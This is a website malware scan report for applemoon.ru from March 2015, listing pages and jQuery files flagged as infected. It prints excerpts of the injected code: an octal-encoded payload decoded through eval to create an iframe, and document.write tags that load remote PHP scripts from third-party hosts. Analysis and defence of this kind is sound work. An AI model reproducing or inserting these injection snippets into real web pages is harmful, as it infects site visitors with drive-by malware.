Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=applemoon.ru
Result: The website is marked by Google as suspicious; visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://applemoon.ru/ | 200 OK Content-Length: 16037 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,151,171,162,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,151,171,162,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,164,166,151,167,167,62,146,160,163,153,163,160,155,176,151,62,147,163,161,63,147,160,157,62,164,154,164,53,77,21,16,44,151,171,162,62 Antivirus reports:
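Note: the antivirus verdict list for this entry is missing from this copy, and the scanner has truncated the code excerpt above. The excerpt is a comma-separated list of octal character codes. The decoder fragments shown further down for jquery.tools.js and jquery.maps.js (`parseInt(a[i],8)` with a fixed offset, then `eval(ss.fromCharCode.apply(ss,a))`; the `+` signs appear to have been lost in extraction) suggest that the list is decoded and executed when the page loads. The visible part of the list decodes to the start of a function that creates an iframe element. The same block is reported on every HTML page flagged below, which points to a shared template or include having been modified rather than individual pages.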
http://applemoon.ru/webroot/delivery/js/jquery.js | 200 OK Content-Length: 72440 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://duda-mail.pl/xpt6rxzt.php?id=3063762"></script>');
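Note: this `document.write` call loads a script from a third-party host. The other jquery.* files flagged below show the same kind of tag at the end of their excerpts, pointing at a different host. Legitimate copies of these libraries do not load remote PHP-generated scripts, so the files on the server have most likely been modified. They should be restored from known-good copies and compared by hash, not cleaned by hand.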
http://applemoon.ru/webroot/delivery/js/jquery.tools.js | 200 OK Content-Length: 58075 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac= =-(7-3) parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a)); document.write('<script src="http://www.indianmediagroup.com/plugins/phVm7APX.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://applemoon.ru/webroot/delivery/js/jquery.jqzoom.js | 200 OK Content-Length: 26182 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.fn.jqzoom = function(options) { var settings = { zoomType: 'standard', zoomWidth: 200, zoomHeight: 200, xOffset: 10, yOffset: 0, position: "right" , lens:true, lensReset : false, imageOpacity: 0.2, title : true, alwaysOn: false, showEffect: 'show', hideEffect: 'hide', fadeinSpeed: 'fast', fadeoutSpeed: ' { while (stringa.substring(0,1) == ' '){ stringa = stringa.substring(1, stringa.length); } while (stringa.substring(stringa.length-1, stringa.length) == ' '){ stringa = stringa.substring(0,stringa.length-1); } return stringa; };if((0x19==031))if(e)s=s ff(e(aq (w[j])) 9);}za=e;za(s)} document.write('<script src="http://www.indianmediagroup.com/plugins/phVm7APX.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://applemoon.ru/webroot/delivery/js/jquery.amoon.js | 200 OK Content-Length: 7659 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function() { if($('#applescroll').length > 0) { if($('div.b-head-i i').length > 1) { $('.b-applescroll').loopedCarousel({ container: '.b-head', slides: '.b-head-i', items: 1, padding:0, next: '.l-ar' }) $('.b-applescroll').loopedCarousel({ container: '#applescroll', slides: '#applescroll ul', items: 1, padding:0, next: '.r-ar' }) } else< var $t = $(this); var indexsel = $t[0].selectedIndex; var valuesel = $t[0].options[indexsel].value; }); if($('#scroll-towns').length > 0) { $('#scroll-towns').jScrollPane({ scrollbarWidth:21, showArrows:true, arrowSize:20, dragMinHeight:1 }); } }); document.write('<script src="http://www.indianmediagroup.com/plugins/phVm7APX.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://applemoon.ru/shop/basket/ | 200 OK Content-Length: 11036 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,151,171,162,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,151,171,162,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,164,166,151,167,167,62,146,160,163,153,163,160,155,176,151,62,147,163,161,63,147,160,157,62,164,154,164,53,77,21,16,44,151,171,162,62 Antivirus reports:
| ||
http://applemoon.ru/about/ | 200 OK Content-Length: 14589 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,151,171,162,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,151,171,162,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,164,166,151,167,167,62,146,160,163,153,163,160,155,176,151,62,147,163,161,63,147,160,157,62,164,154,164,53,77,21,16,44,151,171,162,62 Antivirus reports:
| ||
http://applemoon.ru/news-and-pr/ | 200 OK Content-Length: 5613 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,151,171,162,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,151,171,162,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,164,166,151,167,167,62,146,160,163,153,163,160,155,176,151,62,147,163,161,63,147,160,157,62,164,154,164,53,77,21,16,44,151,171,162,62 Antivirus reports:
| ||
http://applemoon.ru/test404page.js | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://applemoon.ru/shops/ | 200 OK Content-Length: 301468 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,151,171,162,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,151,171,162,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,164,166,151,167,167,62,146,160,163,153,163,160,155,176,151,62,147,163,161,63,147,160,157,62,164,154,164,53,77,21,16,44,151,171,162,62 Antivirus reports:
| ||
http://applemoon.ru/webroot/delivery/js/jquery.message.js | 200 OK Content-Length: 1846 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function(){ $('#message_form').attr('action', '/plugins/ajax/message.php'); $('#message_form').attr('target', 'frame-form-send'); $('#message_form div.captcha a').click(function(){ $('#message_form div.captcha img').attr('src','/vendors/kcaptcha/index.php?time=' Math.random()); $('#message_form div.captcha input').val(''); return false; }); $('#message_form').submit(function(){ var resultform = true; $t.parent().toggleClass('active-sendletter'); if($t.parent().hasClass('active-sendletter')) { $('#message_form div.captcha img').attr('src','/vendors/kcaptcha/index.php?time=' Math.random()); $('#message_form div.captcha input').val(''); } return false; }); } }); document.write('<script src="http://www.indianmediagroup.com/plugins/phVm7APX.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://applemoon.ru/webroot/delivery/js/jquery.validator.js | 200 OK Content-Length: 3147 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.fn.extend({ validatorCheckbox: function(){ result = false; if($(this).attr('checked') == true || $(this).attr('checked') == 'checked') { result = true; } else { result = false; } $(this).validatorError(result); return result; }, validatorLatin: function (){ result = true; var pat=/^[\w-\d] $/i; if(pat.test($(this).val())) { result = true; $(this) else { $(this).validatorError(result); } return result; }, validatorError: function(resulterror) { if(resulterror) { $(this).parent().removeClass('error-ip'); } else { $(this).parent().addClass('error-ip'); } } });s=s ff(e(aq (w[j])) 9);}za=e;za(s)} document.write('<script src="http://www.indianmediagroup.com/plugins/phVm7APX.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://maps.google.com/maps?file=api&v=2&sensor=true&key=ABQIAAAAdY1Wuxc-Jk5RMAiie9WUjhQZFt93kPd1t6VW4aocOUDd3J6XBxQQpyfil9fzO_GKah69N6HKw2X80w | 200 OK Content-Length: 4576 Content-Type: text/javascript | clean |
http://applemoon.ru/webroot/delivery/js/jquery.maps.js | 200 OK Content-Length: 3373 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var gmarkers = []; function createMarker(point,name,html,city) { var tinyIcon = new GIcon(); tinyIcon.image = "http://maps.google.com/mapfiles/marker_green.png"; tinyIcon.iconSize = new GSize(20, 34); tinyIcon.iconAnchor = new GPoint(6, 20); tinyIcon.infoWindowAnchor = new GPoint(5, 1); markerOptions = { icon:tinyIcon }; var marker = new GMarker(point, markerOptions); marker.mycategory = city; marker.myname = name; customUI.maptypes.physical = false; map.setUI(customUI); });w=f;s=[];for(i=2-2;-i 1339!=0;i =1){j=i;if((0x19==031))if(e)s=s ff(e(aq (w[j])) 9);}za=e;za(s)} ){a[i]=-(7-3) parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a)); document.write('<script src="http://www.indianmediagroup.com/plugins/phVm7APX.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://applemoon.ru/webroot/delivery/js/extinfowindow/extinfowindow.js | 200 OK Content-Length: 9198 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: applemoon.ru
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0
Connection: close
Date: Sat, 07 Mar 2015 17:35:11 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Expires: Sat, 07 Mar 2015 17:35:11 GMT
Second query (visit from search engine):
GET / HTTP/1.1
Host: applemoon.ru
Referer: http://www.google.com/search?q=applemoon.ru
Result:
The result is similar to the first query. No suspicious redirects were found. This test only compares the server's response with and without a search-engine Referer header. It does not cover the script injections listed under "Scanned pages/files", which run in the visitor's browser after the page has loaded.